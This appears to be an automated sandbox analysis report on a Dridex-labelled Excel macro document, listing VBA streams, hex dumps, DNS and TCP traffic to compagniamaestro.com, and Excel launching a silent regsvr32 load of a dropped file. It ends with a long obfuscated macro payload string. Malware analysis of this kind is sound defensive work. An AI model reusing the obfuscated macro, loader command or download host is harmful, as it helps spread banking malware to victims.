                                                                                                                                                                      Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 19 03 00 00 00 00 00 00 01 00 00 00 70 fe a5 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                      VBA Code Keywords

                                                                                                                                                                      Keyword
                                                                                                                                                                      Attribute
                                                                                                                                                                      VB_Name
                                                                                                                                                                      BarUno()
                                                                                                                                                                      ActiveWorkbook.Close
                                                                                                                                                                      VBA Code
                                                                                                                                                                      Attribute VB_Name = "Modulo1"
                                                                                                                                                                      Sub BarUno()
                                                                                                                                                                      ActiveWorkbook.Close 0
                                                                                                                                                                      End Sub
                                                                                                                                                                      VBA File Name: Questa_cartella_di_lavoro.cls, Stream Size: 1014
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:VBA/Questa_cartella_di_lavoro
                                                                                                                                                                      VBA File Name:Questa_cartella_di_lavoro.cls
                                                                                                                                                                      Stream Size:1014
                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . p . . k . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 70 fe 1e 6b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                                      VBA Code Keywords

                                                                                                                                                                      Keyword
                                                                                                                                                                      "Questa_cartella_di_lavoro"
                                                                                                                                                                      False
                                                                                                                                                                      VB_Exposed
                                                                                                                                                                      Attribute
                                                                                                                                                                      VB_Name
                                                                                                                                                                      VB_Creatable
                                                                                                                                                                      VB_PredeclaredId
                                                                                                                                                                      VB_GlobalNameSpace
                                                                                                                                                                      VB_Base
                                                                                                                                                                      VB_Customizable
                                                                                                                                                                      VB_TemplateDerived
                                                                                                                                                                      VBA Code
                                                                                                                                                                      Attribute VB_Name = "Questa_cartella_di_lavoro"
                                                                                                                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                                                                                      Attribute VB_Creatable = False
                                                                                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                                                                                      Attribute VB_Exposed = True
                                                                                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                                                                                      Attribute VB_Customizable = True

                                                                                                                                                                      Streams

                                                                                                                                                                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 564
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:PROJECT
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Stream Size:564
                                                                                                                                                                      Entropy:5.25985243733
                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                      Data ASCII:I D = " { 0 5 6 6 E 4 0 1 - 8 0 6 F - 4 7 1 6 - B 6 4 7 - E 0 B 8 5 9 A 4 D 5 7 D } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l o 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 6 F 9 5 7 3 9 5 7 3 9 5 7 3 9 5 7 3 " . . D P B = " B 0 B 2 0 7 6 8 0 8 6 8 0
                                                                                                                                                                      Data Raw:49 44 3d 22 7b 30 35 36 36 45 34 30 31 2d 38 30 36 46 2d 34 37 31 36 2d 42 36 34 37 2d 45 30 42 38 35 39 41 34 44 35 37 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d
                                                                                                                                                                      Stream Path: PROJECTwm, File Type: data, Stream Size: 128
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:PROJECTwm
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:128
                                                                                                                                                                      Entropy:3.34420769179
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . M o d u l o 1 . M . o . d . u . l . o . 1 . . . . .
                                                                                                                                                                      Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 4d 6f 64 75 6c 6f 31 00 4d 00 6f 00 64 00 75 00 6c 00 6f 00 31 00 00 00 00 00
                                                                                                                                                                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3535
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:3535
                                                                                                                                                                      Entropy:4.33045908783
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                                      Data Raw:cc 61 b2 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                                      Stream Path: VBA/dir, File Type: data, Stream Size: 847
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:VBA/dir
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:847
                                                                                                                                                                      Entropy:6.50704839241
                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                      Data ASCII:. K . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . H . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                                      Data Raw:01 4b b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 48 c3 aa 61 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                                      OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm"

                                                                                                                                                                      Indicators

                                                                                                                                                                      Has Summary Info:False
                                                                                                                                                                      Application Name:unknown
                                                                                                                                                                      Encrypted Document:False
                                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                                      Flash Objects Count:
                                                                                                                                                                      Contains VBA Macros:False

                                                                                                                                                                      Summary

                                                                                                                                                                      Author:brt
                                                                                                                                                                      Last Saved By:
                                                                                                                                                                      Create Time:2020-11-24T09:53:01Z
                                                                                                                                                                      Last Saved Time:2020-11-24T11:16:24Z
                                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                                      Security:0

                                                                                                                                                                      Document Summary

                                                                                                                                                                      Thumbnail Scaling Desired:false
                                                                                                                                                                      Company:
                                                                                                                                                                      Contains Dirty Links:false
                                                                                                                                                                      Shared Document:false
                                                                                                                                                                      Changed Hyperlinks:false
                                                                                                                                                                      Application Version:16.0300

                                                                                                                                                                      Streams

                                                                                                                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 112
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x1CompObj
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:112
                                                                                                                                                                      Entropy:4.6011544911
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Stream Path: f, File Type: data, Stream Size: 54
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:f
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:54
                                                                                                                                                                      Entropy:1.81172045559
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. . ( . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      Data Raw:00 04 28 00 06 0c 06 08 0e 00 00 80 0e 00 00 80 03 00 00 00 0e 00 00 80 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Stream Path: o, File Type: empty, Stream Size: 0
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:o
                                                                                                                                                                      File Type:empty
                                                                                                                                                                      Stream Size:0
                                                                                                                                                                      Entropy:0.0
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:
                                                                                                                                                                      Data Raw:

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Jan 26, 2021 16:23:02.912045002 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:03.301805019 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:03.301907063 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:03.302841902 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:03.693165064 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:03.694083929 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:03.694130898 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:03.694180012 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:03.694200039 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:03.694243908 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:03.694251060 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:03.711025000 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.107418060 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.107537985 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.107724905 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.109021902 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.500246048 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505461931 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505506039 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505538940 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505570889 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505604029 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505637884 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505673885 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.505706072 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.505707026 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505711079 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.505716085 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.505719900 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.505736113 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505762100 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.505776882 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.505872965 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505902052 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:04.505949974 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:23:04.505978107 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:24:09.507774115 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:24:09.507797003 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:24:09.507904053 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:24:47.811249971 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:24:47.811954021 CET49721443192.168.2.5199.192.21.36
                                                                                                                                                                      Jan 26, 2021 16:24:48.203373909 CET44349721199.192.21.36192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:24:48.203593016 CET49721443192.168.2.5199.192.21.36

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Jan 26, 2021 16:22:47.005618095 CET5959653192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:22:47.053801060 CET53595968.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:22:47.848185062 CET6529653192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:22:47.899210930 CET53652968.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:22:49.073790073 CET6318353192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:22:49.131934881 CET53631838.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:22:50.417700052 CET6015153192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:22:50.467363119 CET53601518.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:22:57.842850924 CET5696953192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:22:57.901084900 CET53569698.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:22:58.323486090 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:22:58.382692099 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:22:59.332667112 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:22:59.393166065 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:00.347687006 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:02.347759008 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:02.407136917 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:02.843836069 CET5475753192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:02.909548044 CET53547578.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:06.339118004 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:06.364227057 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:06.398987055 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:06.420820951 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:12.379066944 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:12.429934025 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:29.731949091 CET5501653192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:29.800786972 CET53550168.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:32.523469925 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:32.584140062 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:34.347249031 CET5712853192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:34.395721912 CET53571288.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:35.640244961 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:35.688338995 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:23:40.638962984 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:23:40.699685097 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:24:13.016563892 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:24:13.064419985 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                      Jan 26, 2021 16:24:13.465224028 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                      Jan 26, 2021 16:24:13.536417007 CET53585308.8.8.8192.168.2.5

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                      Jan 26, 2021 16:23:02.843836069 CET192.168.2.58.8.8.80x9076Standard query (0)compagniamaestro.comA (IP address)IN (0x0001)

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                      Jan 26, 2021 16:23:02.909548044 CET8.8.8.8192.168.2.50x9076No error (0)compagniamaestro.com199.192.21.36A (IP address)IN (0x0001)

                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:22:56
                                                                                                                                                                      Start date:26/01/2021
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                      Imagebase:0xe50000
                                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:23:04
                                                                                                                                                                      Start date:26/01/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\AO965P\PN546Y\718.5.
                                                                                                                                                                      Imagebase:0x90000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis

                                                                                                                                                                      Call Graph

                                                                                                                                                                      Graph

                                                                                                                                                                      • Entrypoint
                                                                                                                                                                      • Decryption Function
                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      • Show Help
                                                                                                                                                                      callgraph 10 PagamentoDocumento Asc:1,Replace:1,Len:1,Mid:1,Run:1, Chr:1,Split:1 152 excell Now:1 10->152 161 pagoUno_Layout 161->10 167 BarUno Close:1

                                                                                                                                                                      Module: Foglio1

                                                                                                                                                                      Declaration
                                                                                                                                                                      LineContent
                                                                                                                                                                      1

                                                                                                                                                                      Attribute VB_Name = "Foglio1"

                                                                                                                                                                      2

                                                                                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                      3

                                                                                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                                                                                      4

                                                                                                                                                                      Attribute VB_Creatable = False

                                                                                                                                                                      5

                                                                                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                                                                                      6

                                                                                                                                                                      Attribute VB_Exposed = True

                                                                                                                                                                      7

                                                                                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                                                                                      8

                                                                                                                                                                      Attribute VB_Customizable = True

                                                                                                                                                                      9

                                                                                                                                                                      Attribute VB_Control = "pagoUno, 10, 0, MSForms, Frame"

                                                                                                                                                                      Executed Functions
                                                                                                                                                                      APIsMeta Information

                                                                                                                                                                      Cells

                                                                                                                                                                      Cells

                                                                                                                                                                      SpecialCells

                                                                                                                                                                      xlCellTypeConstants

                                                                                                                                                                      Len

                                                                                                                                                                      Len("C TSeDbaUEm- pO E@K NIzDAI) T!sGWCt!wq-uK!ccbJWdLzt sHqsNgnW #pP(Yw|DYRdXF HSvs/ fMvZBfyLZRF V'L #ZulXS#xq+CuBC BipPZkRfW)k ,Sy1 s-aO6eu( +eR0WS4W 4wg0NbOwpJAi'dJ*er(l |AuROGFcZS L/w MNQBiFL Fy 'ry#apxrn#E +xEDMxNz T a'l SmV@tzErcHXCBDKMygT B'n 7Nl/ *AO(eQ. NB NPqUR )yH5mL1R )NFQZfHsI) F(wc0SD0 k9rh/ m*x (u | uR iFkSSjs/deMrHBpRLqrFz 'vj#o CHT#AF+eo#HA[zu#vG(FG| HRSsFH SnE/b MFYBJzLbSFN 'Wn#kMJ s#Fj+yc#gwvWI#fn( E| HR UF RSzE/GhMPLBSDL gF x'cA#jRY a# K+Oa#G na #cx(FV|zQHOPGZQ'reJhzRygOOATXbN OAA FgXQ U)JBRD Fdj@ GSBTBnuIYe'BiLQk+ JHWCDDiUIr-qGXr NvvSUZJGGTNvO QBZpBEOFdZ'Xg2Vv(yx*M ( L-ES\x1fXG-jaB VMSpNNNTBuDFB)t ShsSjvTs FB (mF*wOzLMTL DfHU W-LdOyw@NDNegDZf) !AyBac!cC-Fu! XD M9 #HH%IsEIv%qHD dGdwBuHQ b)SlQ jB uMJ EeTAN F KSzdXeGDVtFi MLP)Wj5EK6N +sFn X(Ly*Mv%zCDxmGO BkrQMd) TQCnB RMOeEnDAPiFP S AXaiDTEFAEMnU)Nx5Qk6 P+nCnmV(yq*qg%PfSW @h ObrC uCOtDYoUu VcFF DDskO Z'VS2d /Nk1D +zK:cG8is:XC(iA'N BckI @VdSFd'BySze@raOKMCURCnaDkfUVJVdsFg D cOGg' 7NC4B -cKlgN*Uh(Vi* vzOcTTxDUqUMK-MIO r@HFN lDyK)TH!KxjkBeYM#Lx+IGD tGTBBfhQ o)Ey0wG2G 4w *cC(XY|uXRtsFsSSrv/JBM B jLW FX ' l#mIA Q#Bc+ ZBHE%msEaQ%JwDNdGpEB OQQN) QynBIrMC E cArSFsUSVvXcrDnDFGJM Q)ae5Yt6 + unP (bR*SP% wDsfG nBXwQeL)qRQmHBAQMMLE GAbHFC SyLXvmDadFypMBH)Bz5Dm6kN+ninx ( s*S %WQSbm@YDO aCuKCOkD IUaGVXdFEVDrzOXn' 2V /TA1Pr+ O: m8PK:Gu(F 'GxBHwITr@VkSOe'QwSoI@ GOtbC zC DuWUuaV QFgXDrYO w'Tx7FE4Lq-Gol F*Zv(It*bKzR TlBDXJUDD-y OGI@ZrNWjD )UC!McG P!vN-wpFb F ZSDb/ IVvBPuaQITLufRaPQMU@tLDLvD L)fw0xA4aM(G 'y !kZ/ p!Rj* zepTmYDb U -ajOsP@MYNuBDYn)dc!e VhQ!lF-bd!sxfEl!xj*zRzF DYu@jHMSUK f)p !XsLJy!vu'JFTsv'NE!QosFzmk #Cv%rLVyG%PT# eksq4nL1ws#FT+wv#LUBGos !h 'wJTs ' q!a bAksfl#JM% VVNQ%xU#JDChFjeEqGYfckbEXuHK!wn'OXYQm' L!I s x pBrf!Uu-sL!w KoOB JKHH!lO-bQ@Ba-t xkR*RgzT TElDseUzW-vBOsC@KxN DDKq)vH!afHBL!TK-QeRnBFTZS n/cnMrNBErLaLFhQ'JQ#fmgfH#aN+SM#filAxqwk`Arhuxm zjcD`xSnjq!vT*n (Dd|zABZTBhwKnrM 'VM#OxJzUfbeqSyoQA!ei'YhTUp'z !XwmSX2Ti3 j! V-AS!ytDtbq fp ` Ku GdXOElXh sBw!Yl'ooTCB'dI!xfds sAB#UB%n [Fq%Zb#NWqOfz q@ H#g +ol#XaZFoD Z P#lW+UKCAG+iTzxC(zp| B SBUlKwKMKW'Nw#HLT FShXKcPNZwN Oyy!ub-y ! SV QRwMjjCdp#MR%ix[ V% f#Y v fovUkqV# U%aK[ U%hv# a`Oae fSo #qm%KK[iR%yL#Y ExbjnCkf fj @nD#cg+Q !j !yd\iaZLbDm Bvc\ PZLe# O+KhzzX+zmS vDvbQqDKFPB zBO FoW'Cc#TIgRMrpfokLtez9 J#Pa%zNHyADxqUA -cKX bNatSAkJYUTz OroB UB kFi 